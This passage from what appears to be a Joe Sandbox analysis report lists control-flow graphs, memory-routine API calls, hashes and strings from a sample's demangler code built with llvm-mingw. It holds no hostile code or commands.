                                      • API ID: strlen
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$__uuidof$noexcept $operator$operator$starts_with(Res, "operator") && "operator name does not start with 'operator'"$this$throw
                                      • API String ID: 39653677-1316449214
                                      • Opcode ID: eeeaa255a0b47bf375ba76d33c8e646cc80b874b038ff034130d583932985c51
                                      • Instruction ID: da60483d163e045f387cc3e1ae2f5caecd0b2ed7f91bc3b89255390da912ba51
                                      • Opcode Fuzzy Hash: eeeaa255a0b47bf375ba76d33c8e646cc80b874b038ff034130d583932985c51
                                      • Instruction Fuzzy Hash: D7E2E5A2A09B8281EA618F15E84137D77A6EB45B90F6C8931DE8D877D6DF3CE552C300

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1028 7ff6099c6520-7ff6099c6539 1029 7ff6099c6549-7ff6099c655a 1028->1029 1030 7ff6099c653b-7ff6099c6542 1028->1030 1031 7ff6099c6575-7ff6099c657e 1029->1031 1032 7ff6099c655c 1029->1032 1030->1029 1034 7ff6099c6580-7ff6099c6589 1031->1034 1035 7ff6099c65dc-7ff6099c65e6 1031->1035 1033 7ff6099c655e-7ff6099c6574 1032->1033 1037 7ff6099c6640-7ff6099c66bf 1034->1037 1038 7ff6099c658f-7ff6099c6598 1034->1038 1035->1032 1036 7ff6099c65ec-7ff6099c65f8 1035->1036 1039 7ff6099c65fe-7ff6099c6608 1036->1039 1040 7ff6099c66f9-7ff6099c6701 1036->1040 1041 7ff6099c66c5-7ff6099c66d3 1037->1041 1042 7ff6099c688a-7ff6099c68b6 1037->1042 1038->1032 1043 7ff6099c659a-7ff6099c65a4 1038->1043 1046 7ff6099c6610-7ff6099c6619 1039->1046 1040->1032 1050 7ff6099c6707-7ff6099c670a 1040->1050 1047 7ff6099c6849-7ff6099c6854 malloc 1041->1047 1048 7ff6099c66d9-7ff6099c66ee realloc 1041->1048 1044 7ff6099c69c6-7ff6099c69e5 call 7ff6099bd9a0 1042->1044 1045 7ff6099c68bc-7ff6099c68c9 1042->1045 1043->1032 1049 7ff6099c65a6-7ff6099c65af 1043->1049 1078 7ff6099c69e7-7ff6099c69f5 1044->1078 1079 7ff6099c6a06-7ff6099c6a14 1044->1079 1052 7ff6099c6925-7ff6099c6928 1045->1052 1054 7ff6099c662f-7ff6099c6635 1046->1054 1055 7ff6099c661b-7ff6099c6627 1046->1055 1056 7ff6099c6c67 call 7ff6099b2d30 1047->1056 1057 7ff6099c685a-7ff6099c6860 1047->1057 1058 7ff6099c66f4 1048->1058 1059 7ff6099c6877-7ff6099c6883 1048->1059 1060 7ff6099c67a0-7ff6099c67a3 1049->1060 1061 7ff6099c65b5-7ff6099c65b7 1049->1061 1050->1032 1051 7ff6099c6710-7ff6099c672e 1050->1051 1062 7ff6099c6730-7ff6099c673d malloc 1051->1062 1063 7ff6099c675a-7ff6099c679b 1051->1063 1052->1044 1065 7ff6099c692e-7ff6099c6932 1052->1065 1054->1050 1069 7ff6099c663b 1054->1069 1055->1046 1068 7ff6099c6629-7ff6099c662c 1055->1068 1075 7ff6099c6c6c-7ff6099c6c80 _assert 1056->1075 1070 7ff6099c6870 1057->1070 1071 7ff6099c6862-7ff6099c686b memcpy 1057->1071 1058->1056 1059->1042 1060->1032 1067 7ff6099c67a9-7ff6099c67ac 1060->1067 1072 7ff6099c65c0-7ff6099c65c9 1061->1072 1062->1056 1074 7ff6099c6743-7ff6099c6757 1062->1074 1063->1033 1076 7ff6099c6940 1065->1076 1077 7ff6099c6934-7ff6099c6938 1065->1077 1067->1032 1080 7ff6099c67b2-7ff6099c67d0 1067->1080 1068->1054 1069->1032 1070->1059 1071->1070 1072->1060 1073 7ff6099c65cf-7ff6099c65d8 1072->1073 1073->1072 1081 7ff6099c65da 1073->1081 1074->1063 1082 7ff6099c6c86-7ff6099c6ccf _assert call 7ff6099c80f0 call 7ff6099b3f50 1075->1082 1083 7ff6099c6942-7ff6099c6956 memchr 1076->1083 1077->1083 1078->1082 1084 7ff6099c69fb-7ff6099c69ff 1078->1084 1087 7ff6099c6a25-7ff6099c6a2b 1079->1087 1088 7ff6099c6a16-7ff6099c6a1f 1079->1088 1085 7ff6099c67d2-7ff6099c67df malloc 1080->1085 1086 7ff6099c67fc-7ff6099c6844 1080->1086 1081->1033 1083->1044 1091 7ff6099c6958-7ff6099c695f 1083->1091 1084->1079 1085->1056 1090 7ff6099c67e5-7ff6099c67f9 1085->1090 1086->1033 1093 7ff6099c6a30-7ff6099c6a3e call 7ff6099bba60 1087->1093 1088->1087 1092 7ff6099c6af1 1088->1092 1090->1086 1091->1044 1095 7ff6099c6961-7ff6099c696f call 7ff6099c7b80 1091->1095 1096 7ff6099c6af5-7ff6099c6b15 call 7ff6099bd9a0 1092->1096 1105 7ff6099c6a44-7ff6099c6a4c 1093->1105 1106 7ff6099c6c13-7ff6099c6c35 1093->1106 1095->1106 1108 7ff6099c6975-7ff6099c697d 1095->1108 1109 7ff6099c6b51 1096->1109 1110 7ff6099c6b17-7ff6099c6b23 1096->1110 1112 7ff6099c6a4e-7ff6099c6a5f 1105->1112 1113 7ff6099c6acb-7ff6099c6add 1105->1113 1106->1075 1111 7ff6099c6c37-7ff6099c6c4f 1106->1111 1118 7ff6099c697f-7ff6099c6990 1108->1118 1119 7ff6099c6909-7ff6099c691f 1108->1119 1116 7ff6099c6b54-7ff6099c6b57 1109->1116 1110->1116 1120 7ff6099c6b25-7ff6099c6b28 1110->1120 1121 7ff6099c6c51 free 1111->1121 1122 7ff6099c6c56-7ff6099c6c62 1111->1122 1114 7ff6099c6a61-7ff6099c6a70 realloc 1112->1114 1115 7ff6099c6a77-7ff6099c6a82 malloc 1112->1115 1113->1093 1117 7ff6099c6ae3-7ff6099c6ae6 1113->1117 1124 7ff6099c6aa2-7ff6099c6ac7 1114->1124 1125 7ff6099c6a72 1114->1125 1115->1056 1126 7ff6099c6a88-7ff6099c6a8e 1115->1126 1127 7ff6099c6b59-7ff6099c6b5c 1116->1127 1117->1093 1128 7ff6099c6aec-7ff6099c6aef 1117->1128 1129 7ff6099c6996-7ff6099c69a1 malloc 1118->1129 1130 7ff6099c68cb-7ff6099c68da realloc 1118->1130 1119->1044 1119->1052 1123 7ff6099c6b30-7ff6099c6b39 1120->1123 1121->1122 1122->1033 1132 7ff6099c6b49-7ff6099c6b4f 1123->1132 1133 7ff6099c6b3b-7ff6099c6b44 1123->1133 1124->1113 1125->1056 1135 7ff6099c6a90-7ff6099c6a99 memcpy 1126->1135 1136 7ff6099c6a9e 1126->1136 1137 7ff6099c6c11 1127->1137 1138 7ff6099c6b62-7ff6099c6b65 1127->1138 1128->1096 1129->1056 1131 7ff6099c69a7-7ff6099c69ad 1129->1131 1130->1056 1134 7ff6099c68e0-7ff6099c6905 1130->1134 1139 7ff6099c69af-7ff6099c69b8 memcpy 1131->1139 1140 7ff6099c69bd-7ff6099c69c1 1131->1140 1132->1127 1133->1123 1141 7ff6099c6b46 1133->1141 1134->1119 1135->1136 1136->1124 1137->1106 1138->1137 1142 7ff6099c6b6b-7ff6099c6b89 1138->1142 1139->1140 1140->1134 1141->1132 1143 7ff6099c6bb5-7ff6099c6c0f 1142->1143 1144 7ff6099c6b8b-7ff6099c6b98 malloc 1142->1144 1143->1106 1144->1056 1145 7ff6099c6b9e-7ff6099c6bb2 1144->1145 1145->1143
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: malloc$memcpyrealloc$_assert$freememchr
                                      • String ID: 'block-literal'$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Popping empty vector!"$Parser->TemplateParams.size() >= OldNumTemplateParamLists$yptn
                                      • API String ID: 3787261664-3461159648
                                      • Opcode ID: 57f0d196df13843cdacfecd0714ebaf0385c5284f1a26d2321f516d71d41b19e
                                      • Instruction ID: e7e99799ea8681c0dc1ab9084a40416171c0e4c45921b4a610250f9f8299d722
                                      • Opcode Fuzzy Hash: 57f0d196df13843cdacfecd0714ebaf0385c5284f1a26d2321f516d71d41b19e
                                      • Instruction Fuzzy Hash: 2F22C57260AB8281EB248F25E84437977A6FB45B84F6C4635DB9D87796EF3CE145C300

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1252 7ff6099bad10-7ff6099badc2 1253 7ff6099badc8-7ff6099bae12 1252->1253 1254 7ff6099bae56-7ff6099bae60 1252->1254 1255 7ff6099bae18-7ff6099bae23 1253->1255 1256 7ff6099baedc-7ff6099baedf 1253->1256 1257 7ff6099bae62-7ff6099bae78 memcpy 1254->1257 1258 7ff6099baead-7ff6099baeb0 1254->1258 1261 7ff6099bae25-7ff6099bae54 1255->1261 1262 7ff6099bae7a-7ff6099bae9e 1255->1262 1259 7ff6099baee1-7ff6099baefe free 1256->1259 1260 7ff6099baf05-7ff6099baf0f 1256->1260 1263 7ff6099baeb3-7ff6099baed6 1257->1263 1258->1263 1259->1260 1264 7ff6099baf21 1260->1264 1265 7ff6099baf11-7ff6099baf1f memcpy 1260->1265 1266 7ff6099baea5-7ff6099baea8 1261->1266 1262->1266 1263->1255 1263->1256 1267 7ff6099baf23-7ff6099baf44 1264->1267 1265->1267 1268 7ff6099baf4b-7ff6099baf66 1266->1268 1267->1268 1269 7ff6099bafd5-7ff6099bb018 call 7ff6099bcea0 1268->1269 1270 7ff6099baf68-7ff6099baf70 1268->1270 1275 7ff6099bb7a1 1269->1275 1283 7ff6099bb01e-7ff6099bb03b 1269->1283 1271 7ff6099bb0d9-7ff6099bb0dd 1270->1271 1272 7ff6099baf76-7ff6099baf7a 1270->1272 1271->1275 1276 7ff6099bb0e3-7ff6099bb0ea 1271->1276 1272->1269 1274 7ff6099baf7c-7ff6099baf80 1272->1274 1279 7ff6099baf86-7ff6099baf90 1274->1279 1280 7ff6099bb29c-7ff6099bb2a5 1274->1280 1278 7ff6099bb7a3-7ff6099bb7c6 call 7ff6099bdc20 1275->1278 1281 7ff6099bb391-7ff6099bb3b2 call 7ff6099be7e0 1276->1281 1282 7ff6099bb0f0-7ff6099bb0f3 1276->1282 1279->1280 1290 7ff6099baf96-7ff6099bafa1 1279->1290 1288 7ff6099bb2c0-7ff6099bb2cc call 7ff6099be1f0 1280->1288 1289 7ff6099bb2a7-7ff6099bb2b8 call 7ff6099be1f0 1280->1289 1281->1278 1304 7ff6099bb3b8-7ff6099bb3c0 1281->1304 1291 7ff6099bb303-7ff6099bb31c call 7ff6099bcea0 1282->1291 1292 7ff6099bb0f9-7ff6099bb0fc 1282->1292 1284 7ff6099bb041-7ff6099bb04f 1283->1284 1285 7ff6099bb1b9 1283->1285 1284->1275 1293 7ff6099bb055-7ff6099bb05b 1284->1293 1297 7ff6099bb8df-7ff6099bb8f3 _assert 1285->1297 1298 7ff6099bb1bf-7ff6099bb1c3 1285->1298 1288->1275 1315 7ff6099bb2d2-7ff6099bb2e2 call 7ff6099bad10 1288->1315 1289->1275 1314 7ff6099bb2be 1289->1314 1290->1269 1291->1275 1311 7ff6099bb322-7ff6099bb32e 1291->1311 1292->1275 1301 7ff6099bb102-7ff6099bb119 call 7ff6099bcea0 1292->1301 1293->1275 1302 7ff6099bb061-7ff6099bb07a 1293->1302 1308 7ff6099bb8f9-7ff6099bb922 call 7ff6099b2d30 call 7ff6099bdc20 call 7ff6099b3f50 1297->1308 1305 7ff6099bb1ca-7ff6099bb1d7 1298->1305 1301->1275 1319 7ff6099bb11f-7ff6099bb137 1301->1319 1302->1275 1310 7ff6099bb080-7ff6099bb087 1302->1310 1304->1278 1312 7ff6099bb3c6-7ff6099bb3de 1304->1312 1305->1278 1313 7ff6099bb1dd-7ff6099bb1e9 1305->1313 1320 7ff6099bb090-7ff6099bb09e 1310->1320 1321 7ff6099bb330-7ff6099bb338 1311->1321 1322 7ff6099bb374-7ff6099bb377 1311->1322 1323 7ff6099bb3e0-7ff6099bb3ed malloc 1312->1323 1324 7ff6099bb40a-7ff6099bb45b 1312->1324 1325 7ff6099bb1ff-7ff6099bb20c 1313->1325 1326 7ff6099bb1eb-7ff6099bb1f9 1313->1326 1314->1315 1315->1275 1351 7ff6099bb2e8-7ff6099bb2f3 1315->1351 1331 7ff6099bb163-7ff6099bb1b4 1319->1331 1332 7ff6099bb139-7ff6099bb146 malloc 1319->1332 1333 7ff6099bb0a4-7ff6099bb0aa 1320->1333 1334 7ff6099bb5a2-7ff6099bb5a9 1320->1334 1321->1322 1335 7ff6099bb33a-7ff6099bb33e 1321->1335 1328 7ff6099bb5ae-7ff6099bb5b0 1322->1328 1329 7ff6099bb37d-7ff6099bb380 1322->1329 1323->1308 1336 7ff6099bb3f3-7ff6099bb407 1323->1336 1324->1278 1337 7ff6099bb20e-7ff6099bb22c 1325->1337 1338 7ff6099bb232-7ff6099bb240 1325->1338 1326->1278 1326->1325 1328->1275 1342 7ff6099bb5b6-7ff6099bb5c3 call 7ff6099be720 1328->1342 1329->1328 1340 7ff6099bb386-7ff6099bb38c 1329->1340 1331->1278 1332->1308 1341 7ff6099bb14c-7ff6099bb160 1332->1341 1343 7ff6099bb0ac-7ff6099bb0c9 1333->1343 1344 7ff6099bb0cb-7ff6099bb0ce 1333->1344 1334->1305 1345 7ff6099bb340-7ff6099bb348 1335->1345 1346 7ff6099bb34a-7ff6099bb34c 1335->1346 1336->1324 1337->1338 1347 7ff6099bb7c7-7ff6099bb7e0 1337->1347 1349 7ff6099bb25f-7ff6099bb270 1338->1349 1350 7ff6099bb242-7ff6099bb247 1338->1350 1340->1342 1341->1331 1375 7ff6099bb75c-7ff6099bb75f 1342->1375 1343->1320 1343->1344 1344->1305 1355 7ff6099bb0d4 1344->1355 1345->1322 1345->1346 1357 7ff6099bb35d-7ff6099bb363 1346->1357 1356 7ff6099bb833-7ff6099bb836 1347->1356 1352 7ff6099bb276-7ff6099bb279 1349->1352 1353 7ff6099bb46a-7ff6099bb47a 1349->1353 1350->1349 1359 7ff6099bb249-7ff6099bb259 call 7ff6099bba60 1350->1359 1360 7ff6099bb460-7ff6099bb465 call 7ff6099be660 1351->1360 1361 7ff6099bb2f9-7ff6099bb2fe call 7ff6099be5a0 1351->1361 1352->1353 1363 7ff6099bb27f-7ff6099bb297 1352->1363 1370 7ff6099bb47c-7ff6099bb48a call 7ff6099bba60 1353->1370 1355->1275 1368 7ff6099bb838-7ff6099bb83b 1356->1368 1369 7ff6099bb83d-7ff6099bb84b call 7ff6099bd5c0 1356->1369 1366 7ff6099bb365-7ff6099bb368 1357->1366 1367 7ff6099bb372 1357->1367 1359->1275 1359->1349 1360->1375 1361->1375 1374 7ff6099bb57c-7ff6099bb59d call 7ff6099bdb20 1363->1374 1377 7ff6099bb34e-7ff6099bb357 1366->1377 1378 7ff6099bb36a-7ff6099bb370 1366->1378 1367->1322 1368->1369 1379 7ff6099bb89e-7ff6099bb8d4 call 7ff6099bd9a0 call 7ff6099bd8f0 1368->1379 1369->1278 1388 7ff6099bb851-7ff6099bb859 1369->1388 1370->1278 1389 7ff6099bb490-7ff6099bb498 1370->1389 1374->1375 1375->1278 1377->1278 1377->1357 1378->1367 1378->1377 1379->1350 1410 7ff6099bb8da 1379->1410 1392 7ff6099bb820-7ff6099bb82f 1388->1392 1393 7ff6099bb85b-7ff6099bb86c 1388->1393 1394 7ff6099bb51f-7ff6099bb533 1389->1394 1395 7ff6099bb49e-7ff6099bb4b3 1389->1395 1392->1356 1397 7ff6099bb7e2-7ff6099bb7f1 realloc 1393->1397 1398 7ff6099bb872-7ff6099bb87d malloc 1393->1398 1401 7ff6099bb535-7ff6099bb53e 1394->1401 1402 7ff6099bb558-7ff6099bb577 call 7ff6099bd9a0 1394->1402 1399 7ff6099bb4b5-7ff6099bb4c4 realloc 1395->1399 1400 7ff6099bb4cb-7ff6099bb4d6 malloc 1395->1400 1397->1308 1408 7ff6099bb7f7-7ff6099bb81c 1397->1408 1398->1308 1404 7ff6099bb87f-7ff6099bb885 1398->1404 1405 7ff6099bb4f6-7ff6099bb51b 1399->1405 1406 7ff6099bb4c6 1399->1406 1400->1308 1407 7ff6099bb4dc-7ff6099bb4e2 1400->1407 1401->1370 1409 7ff6099bb544-7ff6099bb552 1401->1409 1402->1374 1412 7ff6099bb895-7ff6099bb899 1404->1412 1413 7ff6099bb887-7ff6099bb890 memcpy 1404->1413 1405->1394 1406->1308 1414 7ff6099bb4e4-7ff6099bb4ed memcpy 1407->1414 1415 7ff6099bb4f2 1407->1415 1408->1392 1409->1370 1409->1402 1410->1349 1412->1408 1413->1412 1414->1415 1415->1405
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: memcpy$free
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Index <= size() && "dropBack() can't expand!"$Ua9enabl$able_ifI$guard variable for $initializer for module
                                      • API String ID: 2888793982-723539340
                                      • Opcode ID: 56c756458f6442a6091dfe210a7685922c485abfd09ba2f0b48504d6191023ce
                                      • Instruction ID: 58f18d8097131ac94b30e234bda02a4c6f18a6a4c191e55b0e4bb5bf0cccdb7f
                                      • Opcode Fuzzy Hash: 56c756458f6442a6091dfe210a7685922c485abfd09ba2f0b48504d6191023ce
                                      • Instruction Fuzzy Hash: 10427332A1AB8585EA648F15E5843AD73B6FB45780F684136DB8E87BD6DF7CE085C300

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1526 7ff6099ba480-7ff6099ba49f call 7ff6099b54a0 1529 7ff6099ba4a1-7ff6099ba4ad 1526->1529 1530 7ff6099ba4b4-7ff6099ba4b7 1526->1530 1531 7ff6099ba4af-7ff6099ba4b2 1529->1531 1532 7ff6099ba4c6-7ff6099ba721 strlen 1529->1532 1533 7ff6099ba4bf-7ff6099ba4c1 1530->1533 1534 7ff6099ba4b9 1530->1534 1531->1530 1531->1532 1536 7ff6099ba723-7ff6099ba72d 1532->1536 1537 7ff6099ba77d-7ff6099ba794 call 7ff6099bba60 1532->1537 1535 7ff6099bab4c-7ff6099bab62 1533->1535 1534->1533 1539 7ff6099ba72f-7ff6099ba733 1536->1539 1540 7ff6099ba7a6-7ff6099ba7ab 1536->1540 1544 7ff6099ba9cf-7ff6099ba9d2 1537->1544 1545 7ff6099ba79a-7ff6099ba7a1 1537->1545 1539->1537 1543 7ff6099ba735-7ff6099ba74a 1539->1543 1542 7ff6099ba7b2-7ff6099ba7cf call 7ff6099bad10 1540->1542 1553 7ff6099ba8a0-7ff6099ba8a2 1542->1553 1554 7ff6099ba7d5-7ff6099ba7e2 1542->1554 1547 7ff6099ba7ad 1543->1547 1548 7ff6099ba74c-7ff6099ba750 1543->1548 1544->1545 1552 7ff6099ba9d8-7ff6099ba9db 1544->1552 1549 7ff6099baabd-7ff6099baac0 1545->1549 1547->1542 1548->1537 1551 7ff6099ba752-7ff6099ba759 1548->1551 1557 7ff6099baac4-7ff6099baacf 1549->1557 1558 7ff6099baac2 1549->1558 1555 7ff6099ba75f-7ff6099ba763 1551->1555 1556 7ff6099ba8be-7ff6099ba8c3 1551->1556 1559 7ff6099ba9e2 1552->1559 1560 7ff6099ba9dd-7ff6099ba9e0 1552->1560 1553->1549 1565 7ff6099ba7e8-7ff6099ba7ed 1554->1565 1566 7ff6099ba88b-7ff6099ba89b 1554->1566 1555->1537 1567 7ff6099ba765-7ff6099ba777 1555->1567 1564 7ff6099ba8ca-7ff6099ba8e4 call 7ff6099bad10 1556->1564 1561 7ff6099baad5-7ff6099baaf8 1557->1561 1562 7ff6099bab7c-7ff6099bab8a 1557->1562 1558->1557 1563 7ff6099ba9e4-7ff6099baa18 1559->1563 1560->1563 1568 7ff6099baaff-7ff6099bab12 1561->1568 1569 7ff6099baafa free 1561->1569 1575 7ff6099bab70-7ff6099bab76 1562->1575 1576 7ff6099bab8c-7ff6099bab99 free 1562->1576 1570 7ff6099baa1e-7ff6099baa3c 1563->1570 1571 7ff6099bab9b-7ff6099babaf _assert 1563->1571 1588 7ff6099ba8e6-7ff6099ba8fa 1564->1588 1589 7ff6099ba91c-7ff6099ba922 1564->1589 1573 7ff6099ba7f3-7ff6099ba80c 1565->1573 1574 7ff6099ba8a7-7ff6099ba8b9 1565->1574 1566->1552 1567->1537 1577 7ff6099ba8c5 1567->1577 1578 7ff6099bab14 free 1568->1578 1579 7ff6099bab19-7ff6099bab24 1568->1579 1569->1568 1592 7ff6099baa3e-7ff6099baa4a 1570->1592 1593 7ff6099baa53-7ff6099baa69 1570->1593 1583 7ff6099babb5-7ff6099babd1 call 7ff6099b2d30 call 7ff6099babe0 call 7ff6099b3f50 1571->1583 1581 7ff6099ba80e-7ff6099ba81b malloc 1573->1581 1582 7ff6099ba839-7ff6099ba886 1573->1582 1574->1549 1575->1561 1575->1562 1576->1575 1577->1564 1578->1579 1586 7ff6099bab26 free 1579->1586 1587 7ff6099bab2b-7ff6099bab36 1579->1587 1581->1583 1590 7ff6099ba821-7ff6099ba836 1581->1590 1582->1566 1586->1587 1594 7ff6099bab38 free 1587->1594 1595 7ff6099bab3d-7ff6099bab45 1587->1595 1588->1589 1596 7ff6099ba8fc-7ff6099ba91a 1588->1596 1589->1552 1597 7ff6099ba928 1589->1597 1590->1582 1592->1593 1599 7ff6099baaa0-7ff6099baaac 1593->1599 1600 7ff6099baa6b-7ff6099baa91 realloc 1593->1600 1594->1595 1595->1535 1602 7ff6099bab47 free 1595->1602 1596->1589 1601 7ff6099ba92d-7ff6099ba939 1596->1601 1597->1545 1605 7ff6099baaae-7ff6099baab3 1599->1605 1606 7ff6099baab6-7ff6099baabb 1599->1606 1600->1583 1604 7ff6099baa97-7ff6099baa9c 1600->1604 1607 7ff6099ba9b6-7ff6099ba9cc call 7ff6099bb9a0 1601->1607 1608 7ff6099ba93b-7ff6099ba941 1601->1608 1602->1535 1604->1599 1605->1606 1606->1549 1607->1544 1611 7ff6099ba94f-7ff6099ba955 1608->1611 1612 7ff6099ba943-7ff6099ba94c 1608->1612 1615 7ff6099ba992 1611->1615 1616 7ff6099ba957-7ff6099ba963 1611->1616 1612->1611 1617 7ff6099ba995-7ff6099ba998 1615->1617 1616->1617 1619 7ff6099ba965 1616->1619 1621 7ff6099ba9a3-7ff6099ba9a6 1617->1621 1622 7ff6099ba99a-7ff6099ba99d 1617->1622 1620 7ff6099ba968-7ff6099ba974 1619->1620 1623 7ff6099ba986-7ff6099ba990 1620->1623 1624 7ff6099ba976-7ff6099ba981 1620->1624 1621->1607 1625 7ff6099ba9a8-7ff6099ba9ab 1621->1625 1622->1589 1622->1621 1623->1617 1624->1620 1626 7ff6099ba983 1624->1626 1625->1589 1627 7ff6099ba9b1 1625->1627 1626->1623 1627->1607
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: free$mallocreallocstrlen
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_demangle.cpp$Parser.ForwardTemplateRefs.empty()$___Z$____$_block_i$invocation function for block in $k_invoke
                                      • API String ID: 3545345670-2202808109
                                      • Opcode ID: 861c98a3b672e6a2a383b269d5275672217222fa8a2771e2f6aeb1d11a5c4d7e
                                      • Instruction ID: bcedd02ff15c1601a7d2c1e680e063feeb79980630d4907f52057209a2d89131
                                      • Opcode Fuzzy Hash: 861c98a3b672e6a2a383b269d5275672217222fa8a2771e2f6aeb1d11a5c4d7e
                                      • Instruction Fuzzy Hash: BC127E3290EBC181EA758F04E5543FAB3B6EB94750F694231EA9D42B96EF7CD185CB00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: malloc$strlen
                                      • String ID: objcprot
                                      • API String ID: 832207080-2390413308
                                      • Opcode ID: be403558d5c19889a774bf8358e63478aaf42b095cca7af1ba9038f461d2711f
                                      • Instruction ID: 15e378ea2c4a13e5a0727570daa503907bbd6d7d317189e3914fb1d9ccd3db45
                                      • Opcode Fuzzy Hash: be403558d5c19889a774bf8358e63478aaf42b095cca7af1ba9038f461d2711f
                                      • Instruction Fuzzy Hash: 0C023772609B8191EB158F25E8446A937A6EB09B90F694731DFAC873D6DF3CE562C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID:
                                      • API String ID: 2803490479-0
